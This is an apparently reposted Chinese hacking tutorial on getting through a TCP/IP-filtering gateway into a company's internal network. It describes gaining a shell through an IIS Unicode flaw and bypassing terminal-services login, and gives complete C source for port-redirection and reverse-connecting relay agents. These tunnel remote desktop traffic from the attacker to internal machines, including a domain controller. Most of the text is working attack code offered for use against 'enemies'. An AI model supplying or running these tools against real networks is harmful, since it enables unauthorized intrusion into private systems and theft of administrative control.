分享
 
 
 

如何突破TCP-IP过滤防火墙进入内网

王朝other·作者佚名  2008-05-21
窄屏简体版  字體: |||超大  

现在很多企业或者公司基本上网方式基本上都是申请一条连接到Internet的线路,宽带、DDN、ADSL、ISDN等等,然后用一台服务器做网关,服务器两块网卡,一块是连接到Internet,另一块是连接到内网的HUB或者交换机,然后内网的其他机器就可以通过网关连接到Internet。

也许有些人会这样想,我在内网之中,我们之间没有直接的连接,你没有办法攻击我。事实并非如此,在内网的机器同样可能遭受到来自Internet的攻击,当然前提是攻击者已经取得网关服务器的某些权限,呵呵,这是不是废话?其实,Internet上很多做网关的服务器并未经过严格的安全配置,要获取权限也不是想象中的那么难。

Ok!废话就不说了,切入正题。我们的目标是用我们的TermClient[M$终端服务客户端]连接到敌人内网的TermServer机器。M$的终端服务是一个很好的远程管理工具,不是吗?呵呵。没有做特别说明的话,文中提到的服务器OS都为windows 2000。服务器为Linux或其他的话,原理也差不多,把程序稍微修改就行了。

第一部分:利用TCP socket数据转发进入没有防火墙保护的内网

假设敌人网络拓扑如下图所示,没有安装防火墙或在网关服务器上做TCP/IP限制。

我们的目标是连接上敌人内网的Terminal

Server[192.168.1.3],因为没有办法直接和他建立连接,那么只有先从它的网关服务器上下手了。假如敌人网关服务器是M$的windows 2k,IIS有Unicode漏洞[现在要找些有漏洞的机器太容易了,但我只是scripts kid,只会利用现成的漏洞做些简单的攻击:(555),那么我们就得到一个网关的shell了,我们可以在那上面运行我们的程序,虽然权限很低,但也可以做很多事情了。Ok!让我们来写一个做TCP socket数据转发的小程序,让敌人的网关服务器忠实的为我[202.1.1.1]和敌人内网的TermServer[192.168.1.3]之间转发数据。题外话:实际入侵过程是先取得网关服务器的权限,然后用他做跳板,进一步摸清它的内部网络拓扑结构,再做进一步的入侵,现在敌人的网络拓扑是我们给他设计的,哈哈。

攻击流程如下:

<1>在网关服务器202.2.2.2运行我们的程序AgentGateWay,他监听TCP 3389端口[改成别的,那我们就要相应的修改TermClient了]等待我们去连接。

<2>我们202.1.1.1用TermClient连接到202.2.2.2:3389。

<3>202.2.2.2.接受202.1.1.1的连接,然后再建立一个TCP socket连接到自己内网的TermServer[192.168.1.3]

<4>这样我们和敌人内网的TermServer之间的数据通道就建好了,接下来网关就忠实的为我们转发数据啦。当我们连接到202.2.2.2:3389的时候,其实出来的界面是敌人内网的192.168.1.3,感觉怎么样?:)

程序代码如下:/**********************************************************************Module Name:AgentGateWay.cDate:2001/4/15CopyRight(c) eyas说明:端口重定向工具,在网关上运行,把端口重定向到内网的IP、PORT,就可以进入内网了sock[0]==>sClient sock[1]==>sTarget**********************************************************************/#include#include#include "TCPDataRedird.c"#define TargetIP TEXT("192.168.1.3")#define TargetPort (int)3389#define ListenPort (int)3389//监听端口#pragma comment(lib,"ws2_32.lib")int main(){WSADATA wsd;SOCKET sListen=INVALID_SOCKET,//本机监听的socketsock[2];struct sockaddr_in Local,Client,Target;int iAddrSize;HANDLE hThreadC2T=NULL,//C2T=ClientToTargethThreadT2C=NULL;//T2C=TargetToClientDWORD dwThreadID;__try{if(WSAStartup(MAKEWORD(2,2),&wsd)!=0){printf("WSAStartup() failed:%d",GetLastError());__leave;}sListen=socket(AF_INET,SOCK_STREAM,IPPROTO_IP);if(sListen==INVALID_SOCKET){printf("socket() failed:%d",GetLastError());__leave;}Local.sin_addr.s_addr=htonl(INADDR_ANY);Local.sin_family=AF_INET;Local.sin_port=htons(ListenPort);

Target.sin_family=AF_INET;Target.sin_addr.s_addr=inet_addr(TargetIP);Target.sin_port=htons(TargetPort);

if(bind(sListen,(struct sockaddr*)&Local,sizeof(Local))==SOCKET_ERROR){printf("bind() failed:%d",GetLastError());__leave;}if(listen(sListen,1)==SOCKET_ERROR){printf("listen() failed:%d",GetLastError());__leave;}//scoket循环while(1){printf("*************Waiting Client Connectto**************");iAddrSize=sizeof(Client);//get socket sClientsock[0]=accept(sListen,(struct sockaddr *)&Client,&iAddrSize);if(sock[0]==INVALID_SOCKET){printf("accept() failed:%d",GetLastError());break;}printf("Accept client==>%s:%d",inet_ntoa(Client.sin_addr),ntohs(Client.sin_port));//create socket sTargetsock[1]=socket(AF_INET,SOCK_STREAM,IPPROTO_IP);if(sock[1]==INVALID_SOCKET){printf("socket() failed:%d",GetLastError());__leave;}//connect to target portif(connect(sock[1],(struct sockaddr*)&Target,sizeof(Target))==SOCKET_ERROR){printf("connect() failed:%d",GetLastError());__leave;}printf("connect to target 3389 success!");//创建两个线程进行数据转发hThreadC2T=CreateThread(NULL,0,TCPDataC2T,(LPVOID)sock,0,&dwThreadID);hThreadT2C=CreateThread(NULL,0,TCPDataT2C,(LPVOID)sock,0,&dwThreadID);//等待两个线程结束WaitForSingleObject(hThreadC2T,INFINITE);WaitForSingleObject(hThreadT2C,INFINITE);CloseHandle(hThreadC2T);CloseHandle(hThreadT2C);closesocket(sock[1]);closesocket(sock[0]);printf("*****************ConnectionClose*******************");}//end of sock外循环}//end of try__finally{if(sListen!=INVALID_SOCKET) closesocket(sListen);if(sock[0]!=INVALID_SOCKET) closesocket(sock[0]);if(sock[1]!=INVALID_SOCKET) closesocket(sock[1]);if(hThreadC2T!=NULL) CloseHandle(hThreadC2T);if(hThreadT2C!=NULL) CloseHandle(hThreadT2C);WSACleanup();}return 0;}/*************************************************************************Module:TCPDataRedird.cDate:2001/4/16CopyRight(c) eyasHomePage:www.patching.netThanks to shotgun说明:TCP socket数据转发,sock[0]==>sClient sock[1]==>sTarget*************************************************************************/#define BuffSize 20*1024 //缓冲区大小20k//此函数负责从Client读取数据,然后转发给TargetDWORD WINAPI TCPDataC2T(SOCKET* sock){int iRet,ret=-1,//select 返回值iLeft,idx,iSTTBCS=0;//STTBCS=SendToTargetBuffCurrentSizechar szSendToTargetBuff[BuffSize]=,szRecvFromClientBuff[BuffSize]=;fd_set fdread,fdwrite;printf("*****************ConnectionActive*******************");while(1){FD_ZERO(&fdread);FD_ZERO(&fdwrite);FD_SET(sock[0],&fdread);FD_SET(sock[1],&fdwrite);if((ret=select(0,&fdread,&fdwrite,NULL,NULL))==SOCKET_ERROR){printf("select() failed:%d",GetLastError());break;}//printf("select() return value ret=%d",ret);if(ret>0){//sClinet可读,client有数据要发送过来if(FD_ISSET(sock[0],&fdread)){//接收sock[0]发送来的数据iRet=recv(sock[0],szRecvFromClientBuff,BuffSize,0);if(iRet==SOCKET_ERROR){printf("recv() from sock[0] failed:%d",GetLastError());break;}else if(iRet==0)break;printf("recv %d bytes from sClinet.",iRet);//把从client接收到的数据存添加到发往target的缓冲区memcpy(szSendToTargetBuff+iSTTBCS,szRecvFromClientBuff,iRet);//刷新发往target的数据缓冲区当前buff大小iSTTBCS+=iRet;//清空接收client数据的缓冲区memset(szRecvFromClientBuff,0,BuffSize);}//sTarget可写,把从client接收到的数据发送到targetif(FD_ISSET(sock[1],&fdwrite)){//转发数据到target的3389端口iLeft=iSTTBCS;idx=0;while(iLeft>0){iRet=send(sock[1],&szSendToTargetBuff[idx],iLeft,0);if(iRet==SOCKET_ERROR){printf("send() to target failed:%d",GetLastError());break;}printf("send %d bytes to target",iRet);iLeft-=iRet;idx+=iRet;}//清空缓冲区memset(szSendToTargetBuff,0,BuffSize);//重置发往target的数据缓冲区当前buff大小iSTTBCS=0;}}//end of select retSleep(1);}//end of data send & recv循环return 0;}//此函数负责从target读取数据,然后发送给clientDWORD WINAPI TCPDataT2C(SOCKET* sock){int iRet,ret=-1,//select 返回值iLeft,idx,iSTCBCS=0;//STCBCS=SendToClientBuffCurrentSizechar szRecvFromTargetBuff[BuffSize]=,szSendToClientBuff[BuffSize]=;fd_set fdread,fdwrite;

while(1){FD_ZERO(&fdread);FD_ZERO(&fdwrite);FD_SET(sock[0],&fdwrite);FD_SET(sock[1],&fdread);if((ret=select(0,&fdread,&fdwrite,NULL,NULL))==SOCKET_ERROR){printf("select() failed:%d",GetLastError());break;}if(ret>0){//sTarget可读,从target接收数据if(FD_ISSET(sock[1],&fdread)){//接收target返回数据iRet=recv(sock[1],szRecvFromTargetBuff,BuffSize,0);if(iRet==SOCKET_ERROR){printf("recv() from target failed:%d",GetLastError());break;}else if(iRet==0)break;printf("recv %d bytes from target",iRet);//把从target接收到的数据添加到发送到client的缓冲区memcpy(szSendToClientBuff+iSTCBCS,szRecvFromTargetBuff,iRet);//清空接收target返回数据缓冲区memset(szRecvFromTargetBuff,0,BuffSize);//刷新发送到client的数据缓冲区当前大小iSTCBCS+=iRet;}//client可写,发送target返回数据到clientif(FD_ISSET(sock[0],&fdwrite)){//发送target返回数据到clientiLeft=iSTCBCS;idx=0;while(iLeft>0){iRet=send(sock[0],&szSendToClientBuff[idx],iLeft,0);if(iRet==SOCKET_ERROR){printf("send() to Client failed:%d",GetLastError());break;}printf("send %d bytes to Client",iRet);iLeft-=iRet;idx+=iRet;}//清空缓冲区memset(szSendToClientBuff,0,BuffSize);iSTCBCS=0;}}//end of select retSleep(1);}//end of whilereturn 0;}

利用TCP socket转发和反弹TCP端口进入有防火墙保护的内网

事实上很多内网没有第一部分所说的那么简单啦,我们来看一个有防火墙保护的内网,前提是这个防火墙对反弹TCP端口不做限制,限制了的话,又另当别论了。假设网络拓扑如下:

上面的网络拓扑是我在一次对朋友公司网站授权入侵过程中遇到的。

〈1〉我自己处于公司内网192.168.0.2,通过公司网关202.1.1.1到Internet,但我是网关的admin:)。

〈2〉敌人[其实是friend啦]的网关OS是2k adv

server,在外网网卡上做了TCP/IP限制,只开放了25,53,80,110,3306这几个TCP PORT,通过一个漏洞,我得到了一个shell,可以通过IE来执行系统命令,虽然权限很低。网关有终端服务,登陆验证漏洞补丁未安装,但输入法帮助文件已经被删除了,但是我们可以通过shell把输入法帮助文件upload上去,因为他的系统权限没有设置好,我们可以写,呵呵。这样的话,我们只要能够连接到他的终端服务上去,我们就能绕过登陆验证,得到admin权限了。如何连接?有办法,用TCP socket转发。和第一部分说的一样吗?有些不同。因为他做了TCP/IP限制,我们不能连接他,只能让他来连接我们了,TCP反弹端口,呵呵。

攻击流程如下:

〈1〉在我的服务器202.1.1.1运行AgentMaster,监听TCP PORT 12345,等待202.2.2.2来连接,监听TCP PORT 3389,等待我192.168.0.2连接。

〈2〉在敌人网关机器202.2.2.2运行AgentSlave,连接到202.1.1.1 TCP PORT 12345[注意:是反弹端口,TCP/IP过滤也拿他没办法]

〈3〉我自己192.168.0.2用TermClient连接到自己的服务器202.1.1.1:3389

〈4〉敌人网关上的AgentSlave连接到自己本身在内网的IP==〉192.168.1.1:3389

〈5〉数据通道就建立好啦。两个代理忠实的为我们转发数据,呵呵。当我们连接自己服务器的3389,其实出来的是敌人内网的某台机器,呵呵。

后来发现敌人的主域控制器是192.168.1.4,通过前面与他网关建立的连接,利用一个漏洞轻易的取得主域的admin权限,呵呵。他可能认为主域在内网,网关又做了TCP/IP过滤,攻击者没有办法进入。我只要把AgentSlave设置为连接192.168.1.4:3389,以后就可以直接连接他的主域控制器啦,不过在网关登陆也一样。

程序代码如下[程序中所用到的TCPDataRedird.c已经贴在第一部分,那个文件做数据转发,通用的:/******************************************************************************Module Name:AgentMaster.cDate:2001/4/16CopyRight(c) eyas说明:scoket代理主控端,负责监听两个TCP socket,等待攻击者和AgentSlave来连接,两个scoket都连接成功后,开始转发数据sock[0]是client==〉sock[0] sock[1]是target==〉sock[1]******************************************************************************/#include 〈stdio.h〉#include 〈winsock2.h〉#include "TCPDataRedird.c"#pragma comment(lib,"ws2_32.lib")#define TargetPort 3389//伪装的target的监听端口#define LocalPort 12345//等待AgentSlave来connect的端口int main(){WSADATA wsd;SOCKET s3389=INVALID_SOCKET,//本机监听的socket,等待攻击者连接s1981=INVALID_SOCKET,//监听的socket,等待AgentSlave来连接sock[2]=;struct sockaddr_in Local3389,Local1981,Attack,Slave;int iAddrSize;HANDLE hThreadC2T=NULL,//C2T=ClientToTargethThreadT2C=NULL;//T2C=TargetToClientDWORD dwThreadID;__try{//load winsock libraryif(WSAStartup(MAKEWORD(2,2),&wsd)!=0){printf("WSAStartup() failed:%d",GetLastError());__leave;}//create sockets3389=socket(AF_INET,SOCK_STREAM,IPPROTO_IP);if(s3389==INVALID_SOCKET){printf("socket() failed:%d",GetLastError());__leave;}//create sockets1981=socket(AF_INET,SOCK_STREAM,IPPROTO_IP);if(s1981==INVALID_SOCKET){printf("socket() failed:%d",GetLastError());__leave;}//fill the structLocal3389.sin_addr.s_addr=htonl(INADDR_ANY);Local3389.sin_family=AF_INET;Local3389.sin_port=htons(TargetPort);Local1981.sin_addr.s_addr=htonl(INADDR_ANY);Local1981.sin_family=AF_INET;Local1981.sin_port=htons(LocalPort);//bind s3389 for attackerif(bind(s3389,(struct sockaddr*)&Local3389,sizeof(Local3389))==SOCKET_ERROR){printf("bind() failed:%d",GetLastError());__leave;}//listen for attacker to connectif(listen(s3389,1)==SOCKET_ERROR){printf("listen() failed:%d",GetLastError());__leave;}//bind s1981 for AgentSlaveif(bind(s1981,(struct sockaddr*)&Local1981,sizeof(Local1981))==SOCKET_ERROR){printf("bind() failed:%d",GetLastError());__leave;}//listen for AgentSlave to connectif(listen(s1981,1)==SOCKET_ERROR){printf("listen() failed:%d",GetLastError());__leave;}//socket循环while(1){//wait for AgentSlave to connectiAddrSize=sizeof(Slave);sock[1]=accept(s1981,(struct sockaddr *)&Slave,&iAddrSize);if(sock[1]==INVALID_SOCKET){printf("accept() failed:%d",GetLastError());break;}printf("Accept AgentSlave==〉%s:%d",inet_ntoa(Slave.sin_addr),ntohs(Slave.sin_port));//wait for Attacker to connectiAddrSize=sizeof(Attack);sock[0]=accept(s3389,(struct sockaddr *)&Attack,&iAddrSize);if(sock[0]==INVALID_SOCKET){printf("accept() failed:%d",GetLastError());break;}printf("Accept Attacker==〉%s:%d",inet_ntoa(Attack.sin_addr),ntohs(Attack.sin_port));//创建两个线程进行数据转发hThreadC2T=CreateThread(NULL,0,TCPDataC2T,(LPVOID)sock,0,&dwThreadID);hThreadT2C=CreateThread(NULL,0,TCPDataT2C,(LPVOID)sock,0,&dwThreadID);//等待两个线程结束WaitForSingleObject(hThreadC2T,INFINITE);CloseHandle(hThreadC2T);CloseHandle(hThreadT2C);closesocket(sock[0]);closesocket(sock[1]);}//end of socket while}//end of try__finally{//clean allif(s3389!=INVALID_SOCKET) closesocket(s3389);if(s1981!=INVALID_SOCKET) closesocket(s1981);if(sock[0]!=INVALID_SOCKET) closesocket(sock[0]);if(sock[1]!=INVALID_SOCKET) closesocket(sock[1]);if(hThreadC2T!=NULL) CloseHandle(hThreadC2T);if(hThreadT2C!=NULL) CloseHandle(hThreadT2C);WSACleanup();}return 0;}/***********************************************************************************Module:AgentSlave.cDate:2001/4/17Copyright(c)eyasHomePage:www.patching.net说明:这个程序负责连接最终目标,连接主控端,然后转发数据这里连接到AgenrMaster的socket相当与sClient==〉sock[0],连接到最终目标的socoket是sTarget==〉sock[1]***********************************************************************************/#include 〈stdio.h〉#include 〈winsock2.h〉#include "TCPDataRedird.c"#pragma comment(lib,"ws2_32.lib")#define TargetIP "192.168.1.3"#define TargetPort (int)3389#define AgentMasterIP "202.1.1.1"#define AgentMasterPort (int)12345int main(){WSADATA wsd;SOCKET sock[2]=;struct sockaddr_in Master,Target;HANDLE hThreadC2T=NULL,//C2T=ClientToTargethThreadT2C=NULL;//T2C=TargetToClientDWORD dwThreadID;__try{//load winsock libraryif(WSAStartup(MAKEWORD(2,2),&wsd)!=0){printf("WSAStartup() failed:%d",GetLastError());__leave;}//循环while(1){//create client socketsock[0]=socket(AF_INET,SOCK_STREAM,IPPROTO_IP);if(sock[0]==INVALID_SOCKET){printf("socket() failed:%d",GetLastError());__leave;}//create target socketsock[1]=socket(AF_INET,SOCK_STREAM,IPPROTO_IP);if(sock[1]==INVALID_SOCKET){printf("socket() failed:%d",GetLastError());__leave;}//fill structTarget.sin_family=AF_INET;Target.sin_addr.s_addr=inet_addr(TargetIP);Target.sin_port=htons(TargetPort);Master.sin_family=AF_INET;Master.sin_addr.s_addr=inet_addr(AgentMasterIP);Master.sin_port=htons(AgentMasterPort);//connect to AgentMasterif(connect(sock[0],(struct sockaddr*)&Master,sizeof(Master))==SOCKET_ERROR){//连接失败后,等待一会儿再连printf("connect() to master failed:%d",GetLastError());closesocket(sock[0]);closesocket(sock[1]);Sleep(5000);continue;}printf("connect to %s %d success!",AgentMasterIP,AgentMasterPort);//connect to targetif(connect(sock[1],(struct sockaddr*)&Target,sizeof(Target))==SOCKET_ERROR){printf("connect() to target failed:%d",GetLastError());__leave;}printf("connect to %s %d success!",TargetIP,TargetPort);//创建两个线程进行数据转发hThreadC2T=CreateThread(NULL,0,TCPDataC2T,(LPVOID)sock,0,&dwThreadID);hThreadT2C=CreateThread(NULL,0,TCPDataT2C,(LPVOID)sock,0,&dwThreadID);//等待两个线程结束WaitForSingleObject(hThreadC2T,INFINITE);CloseHandle(hThreadC2T);CloseHandle(hThreadT2C);closesocket(sock[0]);closesocket(sock[1]);}//end of while}//end of try__finally{if(sock[0]!=INVALID_SOCKET) closesocket(sock[0]);if(sock[1]!=INVALID_SOCKET) closesocket(sock[1]);if(hThreadC2T!=NULL) CloseHandle(hThreadC2T);if(hThreadT2C!=NULL) CloseHandle(hThreadT2C);WSACleanup();}return 0;

}

 
 
 
免责声明:本文为网络用户发布,其观点仅代表作者个人观点,与本站无关,本站仅提供信息存储服务。文中陈述内容未经本站证实,其真实性、完整性、及时性本站不作任何保证或承诺,请读者仅作参考,并请自行核实相关内容。
2023年上半年GDP全球前十五强
 百态   2023-10-24
美众议院议长启动对拜登的弹劾调查
 百态   2023-09-13
上海、济南、武汉等多地出现不明坠落物
 探索   2023-09-06
印度或要将国名改为“巴拉特”
 百态   2023-09-06
男子为女友送行,买票不登机被捕
 百态   2023-08-20
手机地震预警功能怎么开?
 干货   2023-08-06
女子4年卖2套房花700多万做美容:不但没变美脸,面部还出现变形
 百态   2023-08-04
住户一楼被水淹 还冲来8头猪
 百态   2023-07-31
女子体内爬出大量瓜子状活虫
 百态   2023-07-25
地球连续35年收到神秘规律性信号,网友:不要回答!
 探索   2023-07-21
全球镓价格本周大涨27%
 探索   2023-07-09
钱都流向了那些不缺钱的人,苦都留给了能吃苦的人
 探索   2023-07-02
倩女手游刀客魅者强控制(强混乱强眩晕强睡眠)和对应控制抗性的关系
 百态   2020-08-20
美国5月9日最新疫情:美国确诊人数突破131万
 百态   2020-05-09
荷兰政府宣布将集体辞职
 干货   2020-04-30
倩女幽魂手游师徒任务情义春秋猜成语答案逍遥观:鹏程万里
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案神机营:射石饮羽
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案昆仑山:拔刀相助
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案天工阁:鬼斧神工
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案丝路古道:单枪匹马
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案镇郊荒野:与虎谋皮
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案镇郊荒野:李代桃僵
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案镇郊荒野:指鹿为马
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案金陵:小鸟依人
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案金陵:千金买邻
 干货   2019-11-12
 
推荐阅读
 
 
 
>>返回首頁<<
 
靜靜地坐在廢墟上,四周的荒凉一望無際,忽然覺得,淒涼也很美
© 2005- 王朝網路 版權所有